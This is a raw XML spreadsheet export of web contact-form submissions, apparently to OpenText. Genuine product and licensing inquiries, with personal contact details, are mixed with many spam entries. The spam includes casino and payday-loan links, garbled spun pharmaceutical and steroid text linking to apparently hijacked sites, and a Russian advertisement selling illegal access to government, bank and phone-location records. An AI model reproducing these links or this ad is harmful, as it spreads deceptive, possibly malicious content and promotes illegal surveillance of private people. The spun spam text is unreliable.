A client of ours is using  actuate e report 6.0 designer desktop reports  professional  . working windows 7 OS end user PC_x000D_
_x000D_
They are planning to migrate to Windows 10 OS_x000D_
_x000D_
Wanted to know_x000D_
1. Does actuate e report designer 6.0 works with Windows 10 ? Didn't find anything in the documentation_x000D_
2. If it doesn't then what version do we upgrade to that works with Windows 10 OS?_x000D_
_x000D_
Thx Sujit_x000D_
</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bic.org.my/images/file.php?y=354-Levitra-Bestellen-Ohne-Rezept,Viagra-Online-Paypal,Viagra-Rezeptfrei/]Levitra Bestellen Ohne Rezept[/url]_x000D_
 It is essential that you have adequate calcium in what you eat should you suffer from arthritis. Medical research has verified that inflamation related arthritis situations are even worse when someone lacks ample calcium mineral with their diet plan. You can find calcium in several foods, including dairy, dairy products, and soft ice cream._x000D_
  [url=http://www.sisten.com.br/Content/cache.asp?qqw=331-Igf-1-Spray-Uk-Buy-Kigtropin-Lr3-Side-Steps-Uk]Igf-1 Spray Uk[/url]_x000D_
 Spring season is the greatest time for you to get your house in the marketplace. Mothers and fathers choose to not uproot their kids from schools middle of the-word, and so, getting by later early spring and transferring in the summertime a few months is ideal. Obtaining your agent appointed, your property staged and small repairs done by later Feb ., offers you the greatest timeline for the springtime sale._x000D_
  [url=http://www.bucakbilgisayar.com/counter/want.asp?take=121]generic levitra 10 mg[/url]_x000D_
 Now you are aware of what is required to successfully blog with full confidence and goal. Sociable connection is really a useful result acquired from constant blogging, so usually do not wait to utilize the techniques learned in this article. Your customers will benefit through your attempts so will your business.Discovering How Game Cheat Codes Function_x000D_
  [url=http://www.agenor.com.ar/admin/class.asp?p=345]Buy Viagra Uk Boots[/url]_x000D_
</t>
  </si>
  <si>
    <t>Saludamos a La Clinica Estetica, en Marbella, el centro más respetado de eliminar flacidez brazos, eliminar las celulitis de las piernas  Espa&amp;ntilde;a y en Europa. Desea Explicar más aclaración, sobre : tratamiento contra la celulitis marbella acné marbella y estepona, hiperhidrosis en marbella o puerto banus. Tratamiento anticelulitis marbella tratamiento de hiperhidrosis en marbella o sotogrande, medicina estética corporal marbella or san pedro. Admisible póngase en contacto por correo : beauty@interremi.com y de por fin TFN_::; 670 988 153 WhatsApp Messenger Facebook o además por tel./fax-:: +34 951913089 _x000D_
[url=http://www.marbea.es/micropigmentacion-capilar-marbella-y-malaga-jaen-micropigmentacion-capilar-dermopigmentacion-capilar-tatuaje-capilar-tratamiento-contra-la-alopecia-nuevo-tratamiento-alopecia-alopecia-tratam _x000D_
]micropigmentación capilar Marbella[/url] _x000D_
[url=http://www.marbea.es/micropigmentacion-capilar-marbella-y-malaga-jaen-micropigmentacion-capilar-dermopigmentacion-capilar-tatuaje-capilar-tratamiento-contra-la-alopecia-nuevo-tratamiento-alopecia-alopecia-tratam _x000D_
]micropigmentación capilar[/url] _x000D_
[url=http://www.marbea.es/micropigmentacion-capilar-marbella-y-malaga-jaen-micropigmentacion-capilar-dermopigmentacion-capilar-tatuaje-capilar-tratamiento-contra-la-alopecia-nuevo-tratamiento-alopecia-alopecia-tratam _x000D_
]Marbella[/url]</t>
  </si>
  <si>
    <t>Can this product be used to display X clients running on remote VMs on an iPad?_x000D_
Thanks,_x000D_
Reed</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://casinogamelistus.com/]online slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope you are doing great!_x000D_
_x000D_
My name is Mark and I work for a leading marketing database provider firm. I read some Overview about OpenText™ Digital Asset Management for SAP Solutions and hence I wanted to reach out to you to check if you would be interested in our mailing list of SAP users?_x000D_
_x000D_
I would typically want to suggest you the below mailing targeted lists for your email and marketing campaigns:_x000D_
_x000D_
•	SAP Crystal Reports Users_x000D_
•	SAP ERP Users_x000D_
•	SAP Business Objects Users_x000D_
•	SAP R/3 Users_x000D_
•	SAP Human Capital Management Users_x000D_
•	SAP Sales Users_x000D_
•	SAP Business One Users_x000D_
•	SAP Supply Chain Management Users and more._x000D_
_x000D_
Kindly review this and let me know your thoughts. I would be glad to share more information based on your request._x000D_
_x000D_
Warm regards,_x000D_
_x000D_
Mark Foster_x000D_
Manager, Client Relations_x000D_
</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]real money casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>SETUP UP NEW COMPANY in OPEN TEXT Catalog just lioke our Emile Henry USA company. We would like to do this ASAP. The first 6 digits of our EAN numbers are 366110.</t>
  </si>
  <si>
    <t>I need to move my Gupta report builder from one computer to another and also deploy it on a new user.</t>
  </si>
  <si>
    <t>We are a Managed IT Service Provider and have a client that is interested in opentext fax2mail service.  I look forward to hearing back from you._x000D_
_x000D_
Thanks,_x000D_
Steven</t>
  </si>
  <si>
    <t>Interested in looking into a new BI tool</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know if you have a representative in Argentina. We are evaluating the program Documentum, can you send me more information please._x000D_
_x000D_
Regards,_x000D_
Daniela_x000D_
</t>
  </si>
  <si>
    <t>Do not seem to have access to the support portal</t>
  </si>
  <si>
    <t>I live in Co. Down N. Ireland as a Service _x000D_
Engineer covering All Ireland I am applying for_x000D_
An Irish Passport for when Brexit comes in. If_x000D_
I am working in the Irish Republic ?</t>
  </si>
  <si>
    <t xml:space="preserve">Inquire on pricing for one line for Opentext Rightfax medical line. </t>
  </si>
  <si>
    <t>I would like to discuss cloud/hybrid solution and get a demo if possible._x000D_
thank you_x000D_
jose</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino games[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]play casino games online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;cassino&lt;/a&gt;</t>
  </si>
  <si>
    <t>NIBCO currently uses Exceed V 14. We are working with newer version sof Linux and Exceed is not able to negotiate a client to server cipher algorithm. The new servers accept:_x000D_
_x000D_
chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com_x000D_
_x000D_
What ciphers does the newest version of Exceed support?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>My interest in being up to date on all new technologies._x000D_
And Making contacts.</t>
  </si>
  <si>
    <t>We have an older version (Faxpress) and would like to look into upgrading.</t>
  </si>
  <si>
    <t>Is there a 64 bit version of pixtools?</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for opportunity to work with Opentext . i am a French Translator with 8 years of experience </t>
  </si>
  <si>
    <t>Пробив информации по абсолютно любым госсударственным базам, а так же банкам и сотовым сетям. _x000D_
 _x000D_
Достанем для вас информацию из баз МВД, ГИБДД, ФССП, ФМС, Налоговой, ЕГРП, Пенсионному фонду _x000D_
А так же достанем паспортные данные, сделаем детализацию, определим местоположение абонента таких сетей как МТС, Билайн, Мегафон, Теле2 и достанем информацию из любых российских банков. _x000D_
 _x000D_
Так же имеем много возможностей достать информацию из баз Украины, Беларуси, Казахстана и других стран ближнего зарубежья. _x000D_
 _x000D_
Оплата в большинстве случаев после выполнения заказа, никакого обмана, не требуем предоплат!!! _x000D_
Не стесняйтесь, пишите, спрашивайте, поможем, ответим на все вопросы. _x000D_
 _x000D_
Цены на пробивы от 500 руб! _x000D_
 _x000D_
контакты: _x000D_
 _x000D_
+79180589706 Алексей (телефон, viber, whatsapp, skype) _x000D_
Telegram @alekseydetectiv _x000D_
почта alekseydetectiv@gmail.com</t>
  </si>
  <si>
    <t>Can I get a developer version copy of the latest version of Documentum?</t>
  </si>
  <si>
    <t>I have been trying to get help with downloading the purchased Brava TX 16.3 for the last 2 days with no relief.  It will not work, I am requesting a refund of my purchase immediately!!</t>
  </si>
  <si>
    <t>I am trying to create a ticket.  I wa told by a colleague that I need to have my account linked to HMB to be able to do this.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to get eval license reactivated long enough to test RightFax Encryption Module._x000D_
Eval SUID: 56623-12456. Full license 38591 12112._x000D_
</t>
  </si>
  <si>
    <t>Seeking for SharePoint developer technical lead opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">who supports CDW?  I have a sales opportunity.  </t>
  </si>
  <si>
    <t xml:space="preserve">Extension of Brava Reader </t>
  </si>
  <si>
    <t>To Create a My Support Account There is a Option Called Product Line(What does product line mean ? ) .Can you please provide me a MySupport Account . I am an Employee Working for Accenture.</t>
  </si>
  <si>
    <t>Liebes OpenText-Team,_x000D_
_x000D_
in Rahmen einer wissenschaftlichen Arbeit bin ich auf der Suche nach Software, die es Anlagenbauern erlaubt, Wartungsverträge ihrer Maschinen auszusetzen. Da besagte Verträge sehr komplex ist, Bedarf es einer Software, die mehrere hundert Komponenten und ihre Beziehungen untereinander abbildet. Können Sie mir sagen, inwiefern OpenText eine solche Software bereits anbietet? Interessieren würden mich außerdem die genauen Spezifikationen und der Umfang besagter Software._x000D_
_x000D_
Über eine Rückmeldung Ihrerseits, gerne telefonisch, würde ich mich sehr freuen!_x000D_
_x000D_
Herzlichen Dank vorab und schöne Grüße_x000D_
Annabell Herman</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I did send a question about licenses a couple of days ago but I have not received any answer yet. Is it possible to get some kind of estimation when I can have an answer?_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Kind regards,_x000D_
Ann-Sofie Gottfridsson_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to collaborate on a data validation and interaction for developing your product for future products. There are unmet needs for data validation and authenticity which can be done via software and hardware combinations, it is this I would like to focus on._x000D_
I think it, if appropriate to set up a more suitable communication method._x000D_
Thanks Paul </t>
  </si>
  <si>
    <t>The County will be producing a RFP next week for a Hyland alternative.  We would like OpenText to bid.  I need contact information to send the RFP to ASAP._x000D_
_x000D_
Thank you and apologies for the short notice</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,_x000D_
_x000D_
My name is Steve from SteveWebJobs a professional Animated Promotional Video Company._x000D_
_x000D_
Would you be interested in having an animated marketing video for your company to help increase your online exposure? _x000D_
_x000D_
We can create a custom animated promo video to help market your business more efficiently. _x000D_
_x000D_
If you’re interested, please reply back to this message and I will send you a link to some animated promotional videos we created so you can see what we can do._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear madams, dear sirs,_x000D_
_x000D_
since 2014 we're using streamserve 5.5 for the document output from our ERP system M3 and other systems._x000D_
_x000D_
From time to time we're facing problems with massprint jobs, which create many database entries. We haven't yet the right way to delete massprints from queue etc. even if we're using the database administration tool._x000D_
_x000D_
So, the question is, is there a possibilty of an inhouse training especially on this topic?_x000D_
_x000D_
Thank you for your input._x000D_
_x000D_
i.A. Bianca Stelter_x000D_
_x000D_
_x000D_
_x000D_
Wilhelm Böllhoff GmbH &amp; Co. KG_x000D_
Holding der Böllhoff Gruppe_x000D_
IT Projects, Processes and Consulting (IPC)_x000D_
Supply Chain Execution_x000D_
_x000D_
Archimedesstraße 1-4_x000D_
33649 Bielefeld_x000D_
Tel.: +49 (521) 4482-162_x000D_
Fax: +49 (521) 4482-93162_x000D_
E-Mail: bstelter@boellhoff.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello _x000D_
Would it be possible to use a trial version of this product for research purposes ? I am currently doing a group assignment which requires features of a portal. I wanted to find out if  Opentext would allow us perhaps a two month trial to use this product._x000D_
_x000D_
Kind Regards _x000D_
Sria Telukdarie </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dehban.ir/includes/power.php?option=825-Oxandrolone-Anavar-Manufacturers,Mesterolone-Cycle,Primobolan-Powder-Conversion.html]Oxandrolone Anavar Manufacturers[/url]_x000D_
 To simply manage your coupon codes, get yourself a binder and fill it with baseball cards series pages. Most coupon codes will match inside these pockets. It is possible to flip through this binder each week and find vouchers possibly planning to end or for anything you are planning to go shopping for the full week._x000D_
  [url=http://www.caribouthetraveller.com/blog/error.php?dade=1500]Testosterone Uk Forum[/url]_x000D_
 Should you expertise extreme tenderness, swelling and discomfort, due to your hemorrhoids, one easy and quick approach to lessen these signs or symptoms and consequences, is to put together an ice-cubes load up. Be sure that the ice load up is wrapped or incorporated into a clear plastic baggie, each time you apply it on the area affected._x000D_
  [url=http://www.labanlaboratorio.com.br/img/move.php?page=804]Nandrolone Steroid Side Effects[/url]_x000D_
 A very good way to impress your children by using a game playing method and ensure they stay healthy is to purchase a Nintendo Nintendo wii console. This video games system demands true activity to try out. Your kids will never be resting for many hours on stop enjoying a game title. They have to be getting around in order to play the game titles on this program._x000D_
  [url=http://www.comune.tavernola-bergamasca.bg.it/components/gallery.php?start=1612-Trenbolone-Nz-Buy-Tren-Acetate-Uk-Trenbolone-Acetate-Generic-Supplements/]Trenbolone Nz[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.sormaniproducoes.com.br/menu/user.asp?t=105-Levitra-Senza-Ricetta-Forum-Levitra-Senza-Ricetta-Medica-Prezzo-Levitra-Generico]Levitra Senza Ricetta Forum[/url]_x000D_
 When composing your picture, observe the conditions. If it is overcast outdoors, keep the atmosphere away from your photo whenever possible. White and black photographs are also the ideal choice in order to shoot exterior by using an overcast time. If the weather conditions are nice and sun-drenched, you will get plenty of excellent images, make absolutely certain your subject matter isn't squinting with the sunlight._x000D_
  [url=http://www.ilafaq.com/includes/vendors/slider/slider.php?page=0-Acquisto-Levitra-Acquisto-Levitra-10-Mg-Prezzo-Levitra-Originale-In-Farmacia]Acquisto Levitra[/url]_x000D_
 So there you might have it, when effectively recognized and employed a ton of money could be stored basically from clipping all those coupons from your fliers, classifieds and stamping them off the Online. Now that you use a better understanding of just how much might be stored, placed these details to good use.Helpful Advice For Enjoying The Greatest Online Video Marketing All around_x000D_
  [url=http://www.praktijktabitha.nl/revision/inst.php?tech=Kamagra-Kamagra,Camagra-Voor-Mannen,Kamagra-Oral-Jelly-Kopen-In-Winkel-79]Kamagra Kamagra[/url]_x000D_
 Your lower back pain may well be a faraway storage when you have entry to a vibrating office chair. These recliners are generally prepared distinct energy amounts of the vibrating process in addition to being capable to sharpen in on certain areas of your back. Being a benefit, your seat may well heat, way too!_x000D_
  [url=http://www.khokkwai.go.th/images/banners/view.php?reset=Hygetropin-Nebenwirkungen]Hygetropin-Bestellen[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ryzhenkova.com/wp-content/filter.php?y=261-Buy-Stanozolol-For-Horses-Testosterone-Powder-India-Trenbolone-Cost-Uk/]Buy Stanozolol For Horses[/url]_x000D_
 After you are completed taking photos, try your hands at modifying them. A common technique for creating fascination with a picture is usually to make an just one single-shade display. Make the picture seem to be grayscale, however for a single coloration or subject matter. This will likely make contrast, and attract the eye where you want to buy._x000D_
  [url=http://www.webyhostingbarato.com/wp-content/biller.php?wz=946-Powder-Testosterone-Booster,Testosterone-Powder-India,Trenbolone-Cost-Uk]Powder Testosterone Booster[/url]_x000D_
 Perhaps probably the most important ideas with regards to decor would be to plan in advance. Be sure that your entire colour scheme meshes properly with each other which something you put in your room will improve the appearance you are selecting. Organizing meticulously will assist you to steer clear of pricey mistakes in the future._x000D_
  [url=http://www.parakco.com/footer/button.php?put=Clomiphene-Mechanism-Stanozolol-Side-Effects-Testosterone-Enanthate-Suppliers-Uk-469/]Clomiphene Mechanism[/url]_x000D_
 Finding your own personal splendor and functioning after it so it will be much more noticeable is definitely feasible. The tips above ought to have launched a excellent base that you should develop on, so that you can get and showcase your personal elegance.Don't Let This Joint inflammation Help You Get Straight down Assistance Is In this article!_x000D_
  [url=http://www.pramcuddle.com/wp-admin/component.php?c=461-Clomiphene-Cost-Canada-Anabolic-Steroid-Names-Testosterone-Injections-Ireland/]Clomiphene Cost Canada[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
i'm interested of implementing a fax2mail solution on my organization, the solution will be provided to our B2B customers, _x000D_
i need just a macro cost and delay for implementing such solution_x000D_
_x000D_
Cdly_x000D_
Oussama</t>
  </si>
  <si>
    <t xml:space="preserve">Receiving FAILURE NOTICE upon auto fax.      _x000D_
---_x000D_
Your request received at April 06, 08:21:38 AM GMT from e-mail address aika.hirao@basf.com to be faxed to 81740337369 with a subject of &lt;BJL_DO_6206539524.spdf&gt; could not be delivered._x000D_
Reason for failure: Internal processing error_x000D_
An internal processing error has occurred. Please re-send your request again in a few minutes.  We are sorry for the inconvenience._x000D_
--_x000D_
We set auto fax to customer (designated fax#) as well as 82M6/82M5 for vendor/LSP. If auto fax cannnot be placed simultaneously, pls change setting to priolitaize 82M5, 82M6 vendor/LSP first, them registered customer fax#._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.raquelkussama.com.br/wp-includes/template.php?tag=242/]Kamagra Oral Jelly Switzerland[/url]_x000D_
 Never chew off of greater than it is possible to chew by trying to design and style a number of sites right away. You must always keep points simple by only taking care of a single internet site at a time. Even if you do have some web page design skills, you can find crossed track of your projects, or each of your websites are affected neglect. Just take stuff one at a time._x000D_
  [url=http://www.jhstucco.com/admin/login.php?p=Viagra-150-Mg-Cialis-Preisbindung-Viagra-FÃ¼r-Den-Gesunden-Mann-425.html]Viagra 150 Mg[/url]_x000D_
 When you breakout in your throat or physique consider using a cleanser which includes benzoyl peroxide. This element helps to get rid of the excessive germs that is onto the skin and inhibits future acne breakouts from creating. This product may yield excess inflammation so cease utilizing if you see constant irritation persisting._x000D_
  [url=http://bistech.vn/class/editor.asp?p=383-igf-1-vs-hgh-jintropin-for-sale-IGF-1-LR3-Generic]igf 1 vs hgh[/url]_x000D_
 To aid avoid back pain, dress yourself in comfortable clothing. Clothing which are too small helps keep your blood vessels from circulating and raise the level of ache inside your muscle groups. Try not to get worried an excessive amount of about style during this time. What is important is that you along with the child can really feel as great as feasible every day._x000D_
  [url=http://www.ginecocluj.ro/class/start.php?sky=159]hygetropin yellow top[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi. I was just wondering what the price for attending this event is?_x000D_
Andreas</t>
  </si>
  <si>
    <t>[url=https://mednogorsk.v-karmane-zajm.tk/nayandeksdengi/47-ukaz-prezidenta-325-o-privlechenii-i-predostavlenii-zaymov.html]СѓРєР°Р· РїСЂРµР·РёРґРµРЅС‚Р° 325 Рѕ РїСЂРёРІР»РµС‡РµРЅРёРё Рё РїСЂРµРґРѕСЃС‚Р°РІР»РµРЅРёРё Р·Р°Р№РјРѕРІ - РњРµРґРЅРѕРіРѕСЂСЃРє[/url] _x000D_
[url=https://tuapse.mikroklad-zajm-onlajn.ga/kartyrassrochki/5-vzyat-zaym-30000-na-kartu-srochno.html]РІР·СЏС‚СЊ Р·Р°Р№Рј 30000 РЅР° РєР°СЂС‚Сѓ СЃСЂРѕС‡РЅРѕ - РўСѓР°РїСЃРµ[/url] _x000D_
[url=https://kozhevnikovo.nikola47.gq/nakivi/102-poluchit-bolshoy-zaym.html]РїРѕР»СѓС‡РёС‚СЊ Р±РѕР»СЊС€РѕР№ Р·Р°Р№Рј - РљРѕР¶РµРІРЅРёРєРѕРІРѕ[/url] _x000D_
[url=https://ust-katav.vozmu-chastnyj-zajm.ga/dlyabiznesa/94-blank-dogovora-zayma-besprocentnogo-zayma.html]Р±Р»Р°РЅРє РґРѕРіРѕРІРѕСЂР° Р·Р°Р№РјР° Р±РµСЃРїСЂРѕС†РµРЅС‚РЅРѕРіРѕ Р·Р°Р№РјР° - РЈСЃС‚СЊ-РљР°С‚Р°РІ[/url] _x000D_
[url=https://vuktyl.pajps-zajm.ml/pervyyzaym/23-zaym-pauls.html]Р·Р°Р№Рј РїР°СѓР»СЃ - Р’СѓРєС‚С‹Р»[/url] _x000D_
[url=https://zheleznovodsk.vkarmane-zajmy.ga/avtokredity/18-petrovich-zaym-lichnyy-kabinet.html]РїРµС‚СЂРѕРІРёС‡ Р·Р°Р№Рј Р»РёС‡РЅС‹Р№ РєР°Р±РёРЅРµС‚ - Р–РµР»РµР·РЅРѕРІРѕРґСЃРє[/url] _x000D_
[url=https://kanash.zaim-online-vsem.gq/avtokredity/14-kredit-24-zaym-lichnyy-kabinet.html]РєСЂРµРґРёС‚ 24 Р·Р°Р№Рј Р»РёС‡РЅС‹Р№ РєР°Р±РёРЅРµС‚ - РљР°РЅР°С€[/url] _x000D_
[url=https://valuyki.trojka-zajm.gq/nabankovskiyschet/15-zaymy-ot-fizicheskih-lic.html]Р·Р°Р№РјС‹ РѕС‚ С„РёР·РёС‡РµСЃРєРёС… Р»РёС† - Р’Р°Р»СѓР№РєРё[/url] _x000D_
[url=https://belinskiy.blic-zajm.cf/bezporuchiteley/62-otzyvy-okean-zaym.html]РѕС‚Р·С‹РІС‹ РѕРєРµР°РЅ Р·Р°Р№Рј - Р‘РµР»РёРЅСЃРєРёР№[/url] _x000D_
[url=https://nerekhta.mikroklad-zajm-onlajn.ga/bankovskie/5-kalkulyator-procenty-po-dogovoru-zayma-onlayn-kalkulyator.html]РєР°Р»СЊРєСѓР»СЏС‚РѕСЂ РїСЂРѕС†РµРЅС‚С‹ РїРѕ РґРѕРіРѕРІРѕСЂСѓ Р·Р°Р№РјР° РѕРЅР»Р°Р№РЅ РєР°Р»СЊРєСѓР»СЏС‚РѕСЂ - РќРµСЂРµС…С‚Р°[/url] _x000D_
[url=https://suvorov.bezzalogovyj-zajm.tk/podzalogpts/71-chto-takoe-annuitetnyy-zaym.html]С‡С‚Рѕ С‚Р°РєРѕРµ Р°РЅРЅСѓРёС‚РµС‚РЅС‹Р№ Р·Р°Р№Рј - РЎСѓРІРѕСЂРѕРІ[/url] _x000D_
[url=https://bolot</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
I just have a question to ask about OpenText Imaging. If possible I would love a phone call early next week between 10-2pm if possible._x000D_
_x000D_
Kind regards,_x000D_
J.Batman</t>
  </si>
  <si>
    <t xml:space="preserve">The best </t>
  </si>
  <si>
    <t>I have Rightfax requirements, may I know who is your local Philippine distributor?</t>
  </si>
  <si>
    <t>I have purchased  Brava! Desktop CXL but am having trouble obtaining my license Key</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Allow me to introduce myself, I am Chai and currently with Techtronics Singapore Pte Ltd._x000D_
We are a Samsung Memory distributor in Singapore, we hope to understand your needs with memory products._x000D_
_x000D_
We are the authorised distributor of Samsung Memory. The products we distribute including the following ；_x000D_
-	Consumer DRAM (DDR2 / DDR3 / DDR4)_x000D_
-	Mobile DRAM (LPDDR3 / LPDDR4 / LPDDR4X)_x000D_
-	eMMC_x000D_
-	UFS_x000D_
-	DIMM Module (Long DIMM/ SODIMM/ Server DIMM)_x000D_
-	SSD (Client / Enterprise)_x000D_
_x000D_
If you will have any questions, please feel free to call me._x000D_
_x000D_
Hope to hear from you soon. Thank you. _x000D_
Best Regards_x000D_
Chai  |  蔡丰骏_x000D_
Techtronics (Singapore) Pte. Ltd._x000D_
Mobile : (+65) 96788592 | Skype: fongzun | WeChat : PuiEH90_x000D_
Telephone : +65 6694 8911 | Facsimile : +65 6694 8977 Email : Chaifongzun@techtronics.com.hk_x000D_
Address : 30 Cecil Street, Prudential Tower #18-04, Singapore 049712_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Unable to login and I am getting an "Express Evaluation" watermark on documents being processed through Rendering Server - both JPEG Thumbnails and PDF Renditions</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://casinogamelistus.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino real money&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinogamelistus.com/]best online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino games[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online gambling casino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]cassino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casinos online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino games&lt;/a&gt;</t>
  </si>
  <si>
    <t>We have used the Brava Reader to view TIFF's in an IE frame and was wondering about cost to license. We run around 50 terminal server with a few thousand concurrent users. Only a small percentage of the users use this feature. How does licensing work? How Much $ ? _x000D_
Thanks,_x000D_
Keith</t>
  </si>
  <si>
    <t>Could you please provide me with the names of certified OpenText partners in Western Canada?</t>
  </si>
  <si>
    <t>I am researching document management solutions and would like to learn more information about your products.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently running eDOCS DM 10.0.0. We will be upgrading our servers and will also be upgrading eDOCS DM to the latest version.  I would like to schedule a webinar with someone who can (1) describe the new features of the latest eDOCS DM version, (2) talk about the cloud features of the latest version, if any, and (3) talk about the minimum and recommended hardware requirements necessary to run the latest version as well as future upgrades so that we can keep these requirements in mind when spec'ing out our new server. </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://seorussian.ru]seorussian.ru[/url] - [url=http://seorussian.ru]Разработка сайтов[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">Hello - We have a customer who is using Open Text and we need to know if it is possible to send documents to a customized email address that would then route it to the appropriate folder in our infrastructure. Can someone from your text team please contact me? </t>
  </si>
  <si>
    <t>I am trying to set/reset my support password.  It is failing.</t>
  </si>
  <si>
    <t>We used to work alot with Castelle and would like to re-review the RightFax Express Analog lines as part of our on-premise solution for our healthcare clients and prospective customers.</t>
  </si>
  <si>
    <t>Our client procured the maintenance renewal of Teleform license for another year. We'd like to download the latest version of Teleform but cannot find the download link. Could you please email the download link in plain text to swcustodian@forces.gc.ca? Thanks,</t>
  </si>
  <si>
    <t>looking for legal job</t>
  </si>
  <si>
    <t>Hi, _x000D_
My name is Frank, I'm with Lanner, and we are interested in meeting with your team at the RSA Conference in San Francisco._x000D_
_x000D_
Hope to hear from you soon._x000D_
Best Regards</t>
  </si>
  <si>
    <t>Современные жилые дома стали намного полезнее и красивее, благодаря застекленным балконам. В настоящее время вместо пластиковых рам можно использовать алюминиевые профили. Подробнее читайте на сайте [url=http://montazhnik02.ru]montazhnik02.ru[/url]</t>
  </si>
  <si>
    <t>Looking for help getting data exported from eDocs/Hummingbird.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I would like to find out more about your Electronic Document Management Solution._x000D_
_x000D_
I’ve been tasked to identify possible solutions in Government for Electronic Document Management solutions and would like to work with OpenText on that._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Chris Hoeseb</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.torveparken.dk/picture/access.asp?id_Hent=188]Vente Cialis Generique[/url]_x000D_
 To have a dish all set when investing in property from job make use of a slow cooker or crock cooking pot. Some dishes come prepackaged. All you want do is dump it into the crock pot, possibly then add drinking water and set the warmth. If you like producing your own foods you can get ready components the night time prior to. Soon after you've equipped the constituents place them in the freezer. Add more almost everything on the crock container each day before you go to work._x000D_
  [url=http://www.pedram-ghamisi.com/css/banner.asp?uu=513-Lovegra-Pas-Cher-Cialis-Generique-Tadalafil-30-Pilules-Kamagra-Gel-Pharmacie]Lovegra Pas Cher[/url]_x000D_
 Buyer really like incentives so compensate them only for registering. Just for signing up give them a promotion for the cost-free object after they keep coming back and buy another thing. Since they are providing you with their cell phone variety, reward them one thing beneficial that can keep these finding their way back._x000D_
  [url=http://www.mescargo.com/images/green.asp?f=52/]Buy Hygetropin Black Tops[/url]_x000D_
 A great idea which will help you then become effective at mlm, would be to take initiative. Don't be afraid of failing. If you're scared of breakdown, you'll be reluctant to make choices or you might not really make any decisions in any way. Judgements must be made, to help make cash._x000D_
  [url=http://www.dohiso.com/bandai/component.asp?hj=236-Kamagra-Acheter-Belgique-Acheter-Cialis-Pas-Cher-Acheter-Cialis-Tadalafil]Kamagra Acheter Belgique[/url]_x000D_
</t>
  </si>
  <si>
    <t>Product Demo for ECM Solution</t>
  </si>
  <si>
    <t>Product Demo for ECM</t>
  </si>
  <si>
